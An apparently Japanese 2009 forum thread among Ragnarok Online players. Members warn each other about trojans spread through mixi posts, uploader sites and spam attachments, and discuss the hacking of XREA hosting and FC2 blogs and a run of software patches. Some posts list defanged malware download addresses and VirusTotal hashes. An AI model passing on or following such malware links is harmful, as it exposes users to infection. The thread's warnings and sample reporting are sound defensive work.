ネカフェでRoをすることがあれば、気をつけます! <> (○口○*)さん<>sage<>09/07/16 21:26 ID:VuanqjgW0<> えーと、scr系のアドレスで見覚えないのだったので、報告としてぺたり。

入手元
www●coconlovely●com/wmv.jar <> (○口○*)さん<>sage<>09/07/16 22:58 ID:VuanqjgW0<> mixiに張られていたらしいもの。
一般のアップローダーに置かれているファイルのようですが中身はトロイでした。
検体提出行ってきます。

(報告内容をそのまま転記)
>Rの詠唱時間公式詠唱時間 = (1 - sqrt((dex + int/2)/
>RO モンスター辞書 モロクパッチ対応版(080805) →。
>p://loda■jp/xiaocheng2181/?id=2■zip
>上記2種類の文章で各ROコミュニティへの攻撃が行われています。
>URLの接続先は「ろだJP」というアップローダサイトですが、投稿傾向から判断してアカ
>ウントハックと考えて間違いない様です。
>あまり大規模に書き込まれておらず、mixi運営事務局で早速削除対応しているようです
>が、見かけてもアクセスなさいませんようご注意願います。

play.zip(13/41)
ttp://www.virustotal.com/analisis/075fa5e8c38bf7881e520a460330ec1cb3460d212893015de80a9515fec9b787-1247752816
play.exe(13/41)
ttp://www.virustotal.com/analisis/ddfe746dd0f36286af502d49ed2486e1bf019f3b32081d509bc81b487ffb7a24-1247752853 <> (○口○*)さん<>sage<>09/07/16 23:35 ID:CNt/kXmm0<> 狩場情報ひっそりの事が書かれているからここで質問
このスレで話されてるって事はあそこは管理人個人でサイトを管理していたわけではないの? <> (○口○*)さん<>sage<>09/07/16 23:37 ID:HyGe/IFS0<> 何を知りたいのか分からんが、システムは管理人が作って、
データは投稿で充実させていくタイプ。
仕組み的にはwikiに近い(変更内容が全て残る)。 <> (○口○*)さん<>sage<>09/07/17 03:31 ID:xVFoW2IY0<> ひっそりの管理人氏手製のシステムも、一種のCMSと考えれば良いかと。
利用者がMobやMAPのデータに変更を加えられるように出来ているし。 <> (○口○*)さん<>sage<>09/07/17 10:03 ID:6+OoAMRI0<> ひっそりはdigirock社のXREAというレンタルサーバサービスで動いてた
ドメインのxrea.jpはそこの共有サーバの有料サービス契約時に使えるものというのがその証拠
例えるならオフィスビルの一角にブースを間借りしてたようなもんで
そのビル自体のセキュリティが疑われたというのが今回のデジロウィルス問題

サイトを管理することとサーバを管理することは別で
RO関連でサイト運営とサーバ管理を兼ねているのは弓手wikiとsagewikiぐらい?
(ろ。もハウジングだっけ?)
マジスレテンプレ、未実装wiki、クエスト案内所(のミラー)あたりは個人管理のサーバで動いているけど
サイト管理人本人はサーバ管理をしていない

こういうトラブルでもないかぎりはレンタルの方が個人管理より安全だし、障害時のダウンタイムも短い
なによりよほどのことをしない限りは、金銭的にも労力的にもレンタルの方が遙かに安い
だから大多数のサイトはどこかのサーバをレンタルして運用している
MMOBBSだって契約先は違えど共有サーバをレンタルしてる

ブログとかだって自分で設置したりせず既存サービスに間借りして済ませるでしょ?そういう感覚 <> (○口○*)さん<>sage<>09/07/17 12:27 ID:JfV1PpJx0<> デジロック社関連のレンタル鯖・ドメイン・アクセス解析を使ってて、告知のないサイトは
中華の味方でおkって <> (○口○*)さん<>sage<>09/07/17 12:46 ID:/J1PTKvf0<> >>316
あんま関係ないかもだけど、ひっそり管理人さんはたしかWiki管理人の連絡会だかにも所属してる

>>320
言わんとすることは分からないでもないし趣旨自体は同意できるんだが、短絡過ぎる
書き方は頭悪いとしか思われないぞ。
管理(と、大抵はサーバ代の出費)を負担して面倒なことをやっている事を考えると
そんな風に頭ごなしに罵れないと思うんだが。
「お客様は神様です」の本当の意味を理解したいところだよ。 <> (○口○*)さん<>sage<>09/07/17 13:57 ID:t33YGwi50<> >>321 Wiki管理人の連絡会だか

www.rowiki.jp/index.php/Member
あまり更新されてないけど… <> (○口○*)さん<>sage<>09/07/17 14:24 ID:JfV1PpJx0<> >>321
複数のサイト作成してるけど、レン鯖の状況を伝えるのも管理のうちじゃね。 <> (○口○*)さん<>sage<>09/07/17 16:05 ID:qFo3D6JY0<> 同じことを伝えるにも、表現1つで、その後の人間関係にいろいろ影響するもんですけどね… <> (○口○*)さん<>sage<>09/07/18 06:52 ID:R5LNaNBq0<> なんかレスしようのない投稿が混じってるな、w <> (○口○*)さん<>sage<>09/07/18 14:55 ID:fiEX0GMD0<> お前らすれ違いはほどほどにな。 <> (○口○*)さん<>sage<>09/07/19 00:10 ID:fUl4NVku0<> どうせ短絡させるなら、管轄のIPをまるごとFW遮断、とか言ってしまえw <> (○口○*)さん<>sage<>09/07/21 14:42 ID:GQBKAhbe0<> デジロウィルスについて続報でました。
http://ax.xrea.com/index.php?action=200907 <> (○口○*)さん<>sage<>09/07/21 16:10 ID:fj7IdJZH0<> >>328
URLを張るのは危険だろう

コピペ

> お客様 各位
>
> 平素はアクセスアナライザーをご利用いただき誠にありがとうございます。
>
> 下記内容で、アクセス解析用のサーバーにおきまして不具合がございました。
>
> ○内容
> 分散しておりますデータ解析用のサーバーの2番目のサーバーにおいて、7月7日
> 頃から改ざんされ、不正なページ(10日頃までウィルスが自動ダウンロードさ
> れていた)へリンクするスクリプトが設置されておりました。
> 21日までにサーバーを交換し最新版のソフトウェア、設定に切り替え、運用を
> 再開しています。
>
> ○原因・経緯
> サーバー、ソフトウェア共に、外部に構築依頼しておりましたが、昨年、同様
> の問題(ホームページ編集用のパスワードが受託者以外に漏れていた問題)が
> あった以後から、管理を引き継いでおりました。正直に申し上げますと、委託
> 契約を解除し、そのままシステムを引き継ぎましたが、1番目の解析用サーバー
> は、昨年、自社管理のシステムに移して運用中でございましたが、2番目のサー
> バーについては、直接の問題対象外であったということもあり、システム移行
> 作業を怠り、前システムのまま、つまり、類似の問題が解消されない状態で運
> 用されておりました。 <> (○口○*)さん<>sage<>09/07/21 16:11 ID:fj7IdJZH0<> > この度、2番目、合わせて3番目のサーバーについて自社システムに切り替え、
> 運用を再開しました。
>
> 対応に関する不手際、対応時間など、問題自体以外にも、多々問題があり、大
> 変申し訳なく思っております。本件について猛省し、再度、セキュリティ対策
> を講じたいと存じます。
>
> この度は、ご迷惑、ご心配をおかけし、大変申し訳ございませんでした。
>
> 今後ともよろしくお願い申し上げます。
>
> 以上です。
>
> 2009/07/21 06:00 AM <> (○口○*)さん<>sage<>09/07/21 16:43 ID:eIHpPyUA0<> >>329
ごめん。一応危険性の高いサイトだった。

踏むなら気をつけて踏んでください>>328 <> (○口○*)さん<>sage<>09/07/21 19:33 ID:7/yrE+Ob0<> デジロgdgdだな。
流石に今回は問題が広がり過ぎて、本業のVALUE DOMAINからドメイン管理を引き上げたユーザーも出始めた。
いよいよ、無料レンタルサーバ事業の継続性に疑問が生じてもおかしくはない段階だとは思われる。 <> (○口○*)さん<>sage<>09/07/22 03:48 ID:i+3tQZ5R0<> gnomeさんとこのデジロウイルス対策まとめが出てた
ttp://www3.atword.jp/gnome/2009/07/21/it-seems-i-am-not-guilty-eh/ <> (○口○*)さん<>sage<>09/07/22 13:19 ID:nPRtmB6d0<> 最近FC2ブログ改竄が頻発している、頻度は過去とは比較にならないくらい。
中には放置じゃないものもある。(2009/07/18が最新)
そしてお決まりのしたらば赤石掲示板に投下される、と。

ここ数日中(7/20?22)に中華により上記掲示板にリンク投下を確認した改竄ブログ群。
いずれもFC2へは通報済み。
eroerosu007■blog54■fc2■com (今年の7/18更新で放置ではないと思われる)
kometouzokukome■blog55■fc2■com (3年以上放置)
yousei12345■blog36■fc2■com (半年以上放置)

FC2はもはや改竄の順番待ち状態と考えられるくらい危険な状態か。
放置でなくともやられるくらいだから。
管理できなくなったら放置せず中身消して閉鎖。(リネージュ資料室管理人の弁)
ブログ持ちは気をつけてくれよな! <> (○口○*)さん<>sage<>09/07/22 16:00 ID:IXtawOmd0<> Firefox 3.0.12」公開、3.5/3.5.1と同様の脆弱性を修正

ttp://internet.watch.impress.co.jp/docs/news/20090722_303920.html <> (○口○*)さん<>sage<>09/07/22 20:56 ID:1lqSJSR80<> >>334
改ざんって、アカウントハックされているってことかしら?
中華は常に獲物(活動場所)を探しているってイメージだなあ <> (○口○*)さん<>sage<>09/07/23 00:02 ID:KTlFrxIZ0<> >>336
FC2ブログのアカウントをだね。>ハック
ここに来てこれとは別に以前やられたFC2ブログの再改竄なんかもあるし、
システム上に重大な問題があるとしか思えない。
少なくともこれだけは言える、FC2は本当に中華に愛されてるな、と。 <> (○口○*)さん<>sage<>09/07/23 09:38 ID:TAPYKufl0<> Adobe Readerインストール後は、すぐにアップデート確認を
ttp://internet.watch.impress.co.jp/docs/news/20090722_303913.html

> デンマークのSecuniaは21日、Adobe Readerをダウンロードしてインストールした後は、すぐにアップデートを
>確認するよう注意を呼びかけている。Adobe Systemsが公式ダウンロードサイトで提供しているAdobe Readerが
>最新版ではないのだという。

なにを今更って感じだな。9.1.2が出た時から言われてることなのに。 <> (○口○*)さん<>sage<>09/07/23 18:19 ID:WNH+3GTc0<> Adobeも新規インストーラーちゃんと更新すればいいのに、酷い会社だな。
ついでにいうと9.1.2が出た当初は、新規インストールした場合、メニューから9.1.2への
アップデートが失敗する不具合があった。 <> (○口○*)さん<>sage<>09/07/23 18:27 ID:V7lE8fMb0<> 今更と言われれば今更なのだろうけど、Adobeのサイト自体の造りが、とりあえずインストーラだけ
見せるようなデザインになっていて、他の要素へのアクセシビリティに大きく欠ける構造なのもまた問題。
一応、個別のアップデートファイルはここから落とせる。
ttp://www.adobe.com/jp/support/downloads/acrwin.html
ttp://www.adobe.com/support/downloads/product.jsp?product=10&platform=Windows <> (○口○*)さん<>sage<>09/07/23 18:42 ID:I6NNf5mM0<> Flash Playerに新たな脆弱性、修正版は7月30日までに公開
ttp://internet.watch.impress.co.jp/docs/news/20090723_304201.html

もちろんブラウザ関係ありません。
ちなみにAdobeReader(Acrobat)にも独自のFlashPlayer(authplay.dll)が入っており、
そちらも影響を受けます(現在PDF経由でゼロデイ攻撃中、このdllをリネームすることで
PDF経由での攻撃は阻止できます)。こちらのパッチは翌31日。 <> (○口○*)さん<>sage<>09/07/25 19:01 ID:CpLg9Bmb0<> マイクロソフト セキュリティ情報の事前通知 - 2009 年 7 月 (定例外)
ttp://www.microsoft.com/japan/technet/security/bulletin/ms09-jul-ans.mspx
日本時間29日にIEとVisualStudio。
Adobeからは米国時間で30日にFlashPlayer、31日にAdobeReader(Acrobat)の予定。 <> (○口○*)さん<>sage<>09/07/25 23:48 ID:e2QP8+xc0<> 久しぶりにスパムメールでマルウェア送って来たので、余所にも届いているであろうから報告。
今更感もありますが、覚えのないメールの添付ファイルを取り敢えず叩いてみるとかはしないように。
ちなみに、いずれも英文のメールでした。

これから検体提出しますが、週末の為、一部ベンダーは対応遅れるかと。

一昨日から今日まで何通も届いたspamメールに添付されていた危険ファイル。
ecard.zip
中身はecard.exe(29/41)
ttp://www.virustotal.com/analisis/f3be3edf60cf8423a37d595d6104641123986f75e83a34fc6fe6309b99cae570-1248518193

今日始めて、1通だけ届いたspamメールに添付されていた危険ファイル。
UPSNR_881762167.zip/UPSFILE_NR10128777.zip
中身はエクセルのアイコンのexeファイル。

UPSNR_881762167.exe(12/40)
ttp://www.virustotal.com/analisis/891980cb69c0c7f417489a545744597c17cce45594008c544bad927cb2506b81-1248528957
UPSFILE_NR10128777.exe(19/41)
ttp://www.virustotal.com/analisis/4be8187caafc7f88a309614c64743caac1a85a7aff4169969ebd7bcd4cf67d8e-1248533592 <> (○口○*)さん<>sage<>09/07/26 19:59 ID:VN0UVQOn0<> 50レスほど見返したけど載ってないっぽいからカキコ。
RMC取引に貼られてたからもってきてみた。
www□youtubles□net/mimi/ro.zip <> (○口○*)さん<>sage<>09/07/26 21:43 ID:HKBqxX0Q0<> >>344
検体げっと。AntiVirは普通に検知。カスペとかスルーしてるんで、後で、各ベンダーに提出しときます。

おまけで、mixiに貼られていたもの。例の如く、一般のあぷろだにおかれているようで。
2つとも中身は同じもので 20090716mnwmhxzb■zip というのが落ちてきました。

p://loda■jp/townlocator/?id=1■zip
p://loda■jp/comment10010/?id=1■zip

ro.exe(13/41)
ttp://www.virustotal.com/analisis/a7e67799fb987eba375c701b7fed1be50f9e1ba0b2878c4cbdf9c311bed0fe57-1248612517
20090716mnwmhxzb.exe(14/41)
ttp://www.virustotal.com/analisis/0bef35b0c991625d69a9f31954b5545993419f6ec7d7e0cae41fea2c9ecfe5b8-1248484824 <> (○口○*)さん<>sage<>09/07/27 19:41 ID:LgdGPRa90<> 詳細は分からないが、ROのSNSサイトで
未実装Wiki以外で修羅画像の詳細をググって
見つけたサイトでアカハックに遭ったという報告が。 <> (○口○*)さん<>sage<>09/07/27 22:02 ID:YycbDFXu0<> その詳細を報告して欲しいもんだな。 <> (○口○*)さん<>sage<>09/07/27 22:42 ID:Z9wTRb210<> ROのSNSサイトってのがどこなのか?とか
未実装Wiki以外の修羅画像の詳細をググって、とあるが何をキーワードにしてググったのか?とか
最低でもどっちかが無いと何の意味もない情報だな <> (○口○*)さん<>sage<>09/07/27 23:48 ID:dwOwT/Z60<> 感染者本人がその程度しか説明できないとしたら感染サイト情報も
そいつの思い込みだけの可能性が強い
感染源を特定することは不可能に近いんじゃないかと <> (○口○*)さん<>sage<>09/07/28 00:14 ID:SvhlVGFP0<> 曖昧な情報は役に立たないどころか害にしかならない <> (○口○*)さん<>sage<>09/07/28 12:26 ID:d+T22Cox0<> 曖昧テンションテレレレレ〜 <> (○口○*)さん<>sage<>09/07/28 22:51 ID:Lw0fAb1x0<> なんかゲーム起動する度にノートンISのフィッシング対策がオフになるんだけど
なんか対策あるのかなー。 <> (○口○*)さん<>sage<>09/07/29 06:57 ID:hg8HKPGT0<> WindowsUpdate(定例外)来てます <> (○口○*)さん<>sage<>09/07/29 07:59 ID:yuI8pBn50<> 400MBはでかすぎだろ・・・ <> (○口○*)さん<>sage<>09/07/29 08:25 ID:yuI8pBn50<> ROのWebログイン用のActiveXがATL使ってるから影響を受ける可能性がある。
ないならないで公式発表が欲しいところ。 <> (○口○*)さん<>sage<>09/07/29 13:39 ID:JJg6XvBV0<> マイクロソフト、臨時の修正パッチ2件を公開
ttp://internet.watch.impress.co.jp/docs/news/20090729_305626.html

これか。IEの更新、VC++2005ランタイム、VC++2008ランタイムの3つ当たったわ。 <> (○口○*)さん<>sage<>09/07/30 11:11 ID:xfIB8MwM0<> ブラックスミス・ホワイトスミス(BS,WS)スレ Lv126
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1246914175/633

BSWikiも、いよいよDigiRockに見切りをつけてサーバ移転か。
他のxrea利用Wikiの去就も気になるところだけど、それ以上に管理人氏の懐事情が心配になってくる。 <> (○口○*)さん<>sage<>09/07/30 14:41 ID:qkaeqSWE0<> 懐?格安サーバがあるだろ。っとみるまでは思ってました。

さくらのビジネスプロかよw <> (○口○*)さん<>sage<>09/07/30 15:05 ID:QWXQuivx0<> ちなみにビジネスプロはイニシャル5000円ランニング4500円/月
ttp://www.sakura.ne.jp/rentalserver/pro/
3垢分の課金になるわけで、セキュリティのコストも馬鹿にならないなあ
逆に言うと、それだけのコストと天秤になるほどに、デジロックは駄目だったと <> (○口○*)さん<>sage<>09/07/30 15:09 ID:SH1X0Pl00<> そういやAssassinTemplateが移転してassassin.rowiki.jpじゃなく
なっていたようだけどrowiki.jp統一マンセーしてた人にこーいう場合の
見解を聞いてみたい気がする <> (○口○*)さん<>sage<>09/07/30 16:30 ID:Fvq3E9Ax0<> こそっと中の人です。その辺は連絡会MLにも流したんですが、ここでちょこっとだけ触れておきます。かなりスレ違いですが。

 さくらのビジネスプロはBS-templateの事だけを考えたらかなりのオーバースペックです(BS-templateの
転送量は大体150-200MB/day。さくらのライトですら3GB/day位が上限)。ですが、選択条件として
『マルチドメイン機能』が最低条件でした。これは現在所有するWebSiteを全て1つで賄おうと考えた為です
(分散は管理がとても厄介。加えて所持サイトをまとめると転送量は2-3GB/day位になると予想された)。

 さくらでは全てのプランでマルチドメイン機能は備わっていますが、ビジネスプロ以外ではApacheの生ログが
ドメイン毎に分けて(もしくは識別できるように)出力されないという致命的な欠点があります。アクセス解析サービス
使えば良いかもしれませんが、使い勝手で生ログに勝るものは無いと思ってますので諦める訳にはいきませんでした。

 そして他の会社に目を向けたものの、マルチドメイン機能は貧弱か追加料金を要求されるものばかりでした(spam blog対策か)。
海外も検討したものの、情報収集に難が有る為諦めました。この時点でほぼビジネスプロ一択でした(GMO系やFC2系はハナから選択外)。

 ビジネスプロは同社の他のサービスに比べれば高い気もしますが、PHPが使いやすい(モジュール版且つsafe modeでない)・
DBも3つ使える・IPが一つ貰えるという地味だけど優れた部分も有るので悪い選択ではないと考えます。なんだかんだ言って
さくらは安心できる会社さんですから。

 金銭的な部分は、広告はほぼ付ける気が無いです。かえって広告管理の労力の方が大きい上に利用者は広告を見にWikiに
来ているのではありませんし。まぁ、色々考えてはいるところです。

 突っ込まれて気づきましたが、私、長期休止からRO復帰したんですが1垢しか持っていません。でも実質毎月+3垢分の出費をROに費やすって事で一気に廃人化?ですかね、あははー。

>アサWikiの件
 連絡会MLにはその件は流れていません。rowiki.jpの管理者は弓手Wikiの人なのでそちらに申請しなければ設定はして貰えないはずですし
勝手に設定すべきではありません。先日当方がお願いしたときでも1日も経たずに設定して貰えたので、アサWikiの中の人の意図は分かりませんが、
申請してないだけなのではないでしょうか。 <> (○口○*)さん<>sage<>09/07/30 16:46 ID:6aqSgwHY0<> XREA/COREは機能の多さはピカイチだからな…
他で似たようなの探すとほとんど企業向けの高額サービスという <> (○口○*)さん<>sage<>09/07/30 16:52 ID:R3jz66Hh0<> >>359
安全だけならライトプランでも選べばいいんだ、むしろ安くなる

でもそれだけのコストと天秤になるほど、xreaの機能は値段不相応に充実していたんだよ
だから安全(というより安心)も兼ねようとした結果にBSwikiはコストで涙をのみ
ひっそりは身動きが取れなくなった


と書こうとしたら中の人が。お疲れ様です

>>360
マンセーってほどじゃないけど、正式に移転したならドメイン向けた方が便利だと思う
それが正式な移転であり偽wikiではないということが移転の事情を追わなくても察することができるし
(偽物掴むほど弓手wikiの人は温くないと個人的には信じている)

なによりブックマークやリンクを変えたりドメイン覚え直さなくていいのが楽 <> (○口○*)さん<>sage<>09/07/30 17:03 ID:QWXQuivx0<> 機能が多い分、きっちりやらないと全体的に管理も雑になるというところですな
レンタル鯖板のVDスレ見てると、不安になるのも分かる

普通の企業でも改ざん被害にもあったりするから、
セキュリティ重視となれば選択肢が結構狭まってくる
サービスとして高いレベルでセキュリティをを保とうとすると、情報分析やパッチ作成など
手間は相当かかるはずなので、どうしても高くなるんだろうね
掃除のおばちゃんがいればいいレベルじゃない

懐と訪問者への責任感、人によって秤のかけ具合は違う
責任感を採った中の人の決断はすごいなと
カンパシステムとかあればいいんだろうけどねえ… <> (○口○*)さん<>sage<>09/07/30 18:06 ID:Fvq3E9Ax0<> 降って沸いた休みに乗じて移住の為の作業をバリバリやっています。サーバの移動なので
あちこち手直しをせざるを得ず、呆れる位面倒です。やってもやってもあちこち手直しする部分が。
だから移転なんてやりたくなかったのです(お金よりもこっちのほうがブルーの元)。

実はCoreServer時代は一つサーバ的なラブルがあってサポートに相談したのですが、ぐだぐだで
終わった事があります。そのときの経験から次は無いと決断し、今度は多少お金がかかっても
『安全・安心・安定』で選ぼうと考えたのでした。インフラ系のサービスはその要素がきわめて重要です。

書き忘れたのですが、さくらを選んだのはさくらのスタンダードを使った経験があるという点も
ポイントでした。レンタルサーバは提供会社によって色々と癖や作法が有る事が多いので
新たに覚えるよりは慣れているところを、というのも理由です。それに、大抵のレン鯖はSiteでは
詳細な仕様を書いている事は少なく、試用して確認するという傾向が高い事もありました(面倒!)。
また、先日さくらはARP Spoofingの問題を発生させましたが、その対応はかなり良好でした
(失敗した時が信用を得る機会という良い見本か)。…MMO運営で失敗しているのはマイナスですが。

高機能サーバを借りる事でローカルで行っている処理をサーバ側に移動する事も考えてたのも
理由でした(CoreServerはプロセス実行時間等にかなり制限があった)。ローカル鯖側があぼーんしただけで
Site側が機能不全に陥るのは困りますから(CoreServer時代はサーバ負荷の問題でローカルで出来る事は
ローカルで回していた)。

ちなみに、手持ちの管理サイトを統合させなかったとしても、BSWikiには自ステUP板もあり、これは
別ドメインで運用しています(rowiki.jpはRO WIKIですから)ので結局はマルチドメイン機能は必須でした。

…まぁ、以上の理由など無関係に選択肢が一つしか残らなかった訳ですが。

>安全(というより安心)も兼ねようとした結果
これが端的に今回の移転の理由を表現しています。中華盛んな頃は『アカウントハックアドレスを書き込まれたら
利用者のWikiへの安心が失われる。失ったら取り戻せない。ならば、そうなったら潔く管理人を退く』、そんな覚悟を
当時は抱いていました。 <> (○口○*)さん<>sage<>09/07/30 18:34 ID:bz+dCEr/0<> 何それ <> (○口○*)さん<>sage<>09/07/30 18:34 ID:MKKz+cq+0<> アサwikiがそんなことになってるとは。
移転の経緯とか知らないけど、1度rowiki.jp名乗った以上は後始末もしていって
欲しかった気はするねぇ。rowiki.jp使ってるなら管理組合?参加してる(た)んだろうし。

後始末無しにrowiki.jpから外れたってことは、前?管理人が音信不通とかなのかね??
ざっとアサシン過去スレ読んだけど
ttp://gemma.mmobbs.com/test/read.cgi/ragnarok/1246231236/n523-531
よくわからなかったが。。。
そのわりにスムースに移転・引継ぎ?済んでるように見えるけど。。。 <> (○口○*)さん<>sage<>09/07/30 19:06 ID:40O297F40<> Adobe関連
ShockwavePlayer 11.5.1.601 配布中
FlashPlayer 30日(日本時間31日)予定
AdobeReader(Acrobat) 31日(日本時間8月1日)予定 <> (○口○*)さん<>sage<>09/07/30 19:56 ID:R3jz66Hh0<> >>367
これかな
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1242081562/845
ただの移転で、スレテンプレのほうが二連続で変更されてなかったっぽい

>しばらくしたらrowiki.jpドメインでもアクセスできるようになるかもしれませんが
その気がないわけでもないらしい
なにがあったんだろうね <> (○口○*)さん<>sage<>09/07/31 00:00 ID:2sGJnNs/0<> xreaのサービスは、2006/12にもweb改竄を受けたことがある。
ただこの時は、ユーザーが利用しているphpBBのセキュリティホールを突かれたのが原因であり、比較的早期に
対応、対策が取られていた。
ttp://lineage.paix.jp/guide/security/virus-site.html#XREALOLIPOP

ここ2年ほどの、DigiRock方面のgdgdを見ていると、レン鯖板で言われていたマスタータン退社説は恐らく事実なのだろう。
度重なる改竄行為に対して、この時ほどきっちりと分析も行えていないし、対応も遅きに失している。
原因が外注先から漏れた可能性が高いというあたりからも、ごく限られたエンジニアに依存していて運用ノウハウが
会社に結びつかず、肥大化したサービス規模を無理矢理に維持する為に間に合わせの人員登用で済ませたつけが
まわったと言う感じか。

>アサシンwiki関連など
rowkiドメインでアクセスできることの利便性は、ユーザー側が移転などを意識せず今まで通りのアドレスで閲覧できる
ことと、セキュリティ対策アドオンや、フィルタリングなどでワイルドカード指定が掛けやすいことあたりか。
それ以上に、.jpTLDの詐称や乗っ取りは困難だから、ドメインそのものが安全性に一定の留保を与えている面もあるけど。

あと、連絡会そのもののメンテナンスで多少気になるところもある。
MEプリWikiなど、突然ページ消失と言う形で事実上消滅したケースもあったり、既に籍を置いているだけの幽霊管理者が
残っているようだったりすると、それはそれで問題。 <> (○口○*)さん<>sage<>09/07/31 00:27 ID:wCJhHDVK0<> 担当なり代表は実務を担っている現役の人がなった方がいいよなあ <> (○口○*)さん<>sage<>09/07/31 12:31 ID:cFnfikyb0<> 繋がらなかったassassin.rowiki.jpが「このサーバは、さくらの
レンタルサーバで提供されています。」なんてページに繋がる
ようになったけど。。。動きはあったようだけど、やっぱり
何のアナウンスも無い?ここ最近、どーなってんだ。。。 <> (○口○*)さん<>sage<>09/07/31 14:37 ID:6xcABHkF0<> >nslookup assassin.rowiki.jp
Name: assassin.rowiki.jp
Address: 219.94.163.32

>nslookup aocha.sakura.ne.jp
Name: aocha.sakura.ne.jp
Address: 219.94.163.32

昨日の時点では別のIPアドレスだったから(末尾9だったのだけ覚えてる)
弓手wikiの人がDNS設定をしたってこと

先にサーバ側の受け入れ設定を済ませておけばスムーズだったのかもしれないけど
DNSが向いてからじゃないと設定できない場合もあるし
こういった複数人が遠隔でやる作業の過程はアナウンスしにくいからしょうがない
(時間が経ってるとはいえ>>369みたいなアナウンスも事前にあるわけで)

前assassin.rowiki.jpのサービスを止めたときにはスレに一言あるとよかったけど
今回は(少なくとも建前上は)移転が済んで使われなくなっているドメインへの操作だし
デジロのごとくアナウンスしないままの状況さえ作らなければ事後でも十分だと思う <> (○口○*)さん<>sage<>09/07/31 14:54 ID:t1+k9AHl0<> しかし・・・移転して2カ月くらい経っちゃってるよな・・・ <> (○口○*)さん<>sage<>09/08/04 16:01 ID:upi+gTkc0<> 月末のでようやくAdobe ReaderとFlash Playerのパッチが来た
ttp://get.adobe.com/jp/reader/
Adobe Reader 9.1
現時点では、さらに「製品の更新」で9.1.3になる
ttp://get.adobe.com/jp/flashplayer/
Adobe Flash Playerのバージョン 10.0.32.18

xreaのドタバタも落ちついたっぽいね <> (○口○*)さん<>sage<>09/08/04 18:41 ID:Ua3gJGtM0<> Firefoxが3.5.2/3.0.13に更新された
ttp://internet.watch.impress.co.jp/docs/news/20090804_306916.html

>>375
Adobeのパッチ配布、前に日本語ページでやたら遅れて出したことがあったので
英語ページ見に行ってる…。 <> まとめ臨時 ◆kJfhJwdLoM<>age<>09/08/04 21:56 ID:9q9KMNb90<> ソースチェッカーオンラインの提供が今年末までとの事。

あやふやなドメインを確認する度に利用して
チェックされて出てきた転送先のURLとかが簡単に目視できて助かっていたのですが
来年からは何処でチェックすればと今から心配していたり。



あと余裕があるときに追加する形で
ちょっと前から検索経由で見える範囲で危険そうな分だけ仕入れていましたが
隣の国のブロックリストサイト様のリストも試験的に加えてみました。

ROのアカウントハックと関係あるの?と言われると難しいのですが
理由としては、ドメイン+ポート番号付やら****■3322(8866とか)■org系などが
先ごろ埋められた0-dayな脆弱性を狙ったものだったりするという理由です。
でもイタチゴッコ過ぎてフォローしきれていないのが現状だったり。

>>361
移転作業お疲れ様です。
確かに所持サイトが分散しているとめんどくさいですね。
そして管理が億劫に…と思ったら
もう何ヶ月も更新していないとかそんな脱線話。 <> (○口○*)さん<>sage<>09/08/05 12:00 ID:5ZPqKOPd0<> 素人の俺にも何がどうなっているのか5行で教えてくれ
Wikiが無くなるのかい? <> (○口○*)さん<>sage<>09/08/05 13:57 ID:VjoDlC2T0<> 「Java 6 Update 15」が公開、複数の脆弱性を修正
ttp://internet.watch.impress.co.jp/docs/news/20090805_307166.html
> 最新版では、JPEGファイルのヘッダー解析の不具合によりJava Web Startアプリケーションで
>特権昇格が起こりうる脆弱性など、複数の脆弱性を修正した。

ttp://java.com/ja/download/ <> (○口○*)さん<>sage<>09/08/05 14:12 ID:LiKDtOhh0<> >>378
どっからそんな話が出てきたのか、まずアンカーを貼ってくれ <> (○口○*)さん<>sage<>09/08/05 14:38 ID:VMcYYkQo0<> ソースチェッカーオンライン ttp://so.7walker.net/
ここが今年いっぱいで閉鎖すると言う話。

Janeの右クリックコンテキストメニューから簡単に呼び出せたりと、重宝するサイトの一つ。
今後は、aguse本体やaguse gatewayなどへ移行することになるのだろうか。 <> (○口○*)さん<>sage<>09/08/05 20:47 ID:zXFe4eCW0<> ピコロダに怪しいファイルあがってるね <> (○口○*)さん<>sage<>09/08/05 21:19 ID:ghNuUV4o0<> またWMFっていうなじみのない画像形式であることを利用したガセじゃないのか? <> (○口○*)さん<>sage<>09/08/05 21:21 ID:cyhjTofq0<> まぁ〜ログを読む限りどうだが。

9 08/05 20:09:39 ↓、訂正:ウイルスに感染していないPCでのパス変更 @毎回、ロックをかける
8 08/05 19:55:42 ネカフェでパス変えても意味ないんだろうか
7 08/05 18:36:23 回線が重くなった 二コ動が読みこまねー これが原因か?
6 08/05 18:13:10 似たものでTSPY_WOW.BUっていうウィルスがあります
5 08/05 16:04:49 ここまでして興味ひきたいのかね・・・とりあえず管理人にメールするわ。うpしてるの同一人物だろどうぜ
4 08/05 15:42:38 TSPY_WOW.CUってのが3つに分かれてシステムに入ってきます。気をつけて
3 08/05 14:54:13 そうだとしたら管理人に投稿ログ貰って警察に持ってくといいよ
2 08/05 12:46:09 これwmfファイルを装ったスパイウェアか?なんか入ってきたぞ。
1 08/05 09:50:11 sbrで最強とかないわwwww <> (○口○*)さん<>sage<>09/08/05 22:28 ID:Zqi+ylY90<> ttp://www.virustotal.com/jp/analisis/e30de6e2d93f5b4719f8d8c10ffe05adca265d377df44f592d4a9a975114681c-1249479254
ttp://virusscan.jotti.org/en/scanresult/e5020442c44b742ab8764c1bdcae97fc3fe5c7d5
この結果を見る限り大丈夫じゃないかな? <> (○口○*)さん<>sage<>09/08/05 23:19 ID:GyuKGqH90<> 今カスペのオンラインスキャンできなくなってる?
久しぶりにやろうとしたら、

アップデートに失敗しました。プログラムの開始に失敗しました。
カスペルスキーオンラインスキャナ 7.0 ウィンドウを一旦閉じ、再度開いて
プログラムのインストールを行ってください。
カスペルスキーオンラインスキャナ 7.0 の定義データベースをアップデートするには、
インターネット接続が必要です。
最新の定義データベースに更新することによって、新たなウイルスや脅威を
見つけることが可能になります。
インターネット接続をお確かめの上、再度カスペルスキーオンラインスキャナ 7.0 を
実行してください。 [ERROR: ファイルの操作に失敗しました]

↑こんなメッセージが出てアップデートに失敗したんだけど。
どうやらindex/master.xmlのダウンロードあたりからおかしくなってるみたい。

ちなみに当方win2kだけどJAVA更新済で必要条件は満たしてる、と出てる。
セキュリティ切っても何しても失敗するので、もしやあっちの問題なのかと思ったんだけど… <> (○口○*)さん<>sage<>09/08/06 00:36 ID:1iL0+EkP0<> >>384
ただの猿の絵だったよ。 <> (○口○*)さん<>sage<>09/08/06 02:35 ID:M2TxhSzw0<> 裏側の話だろ・・・・ <> (○口○*)さん<>sage<>09/08/06 07:16 ID:O4r7TK1+0<> >>386
カスペがVerUPしてから環境によってはそうなる
ずっと失敗してるから私はもう諦めた

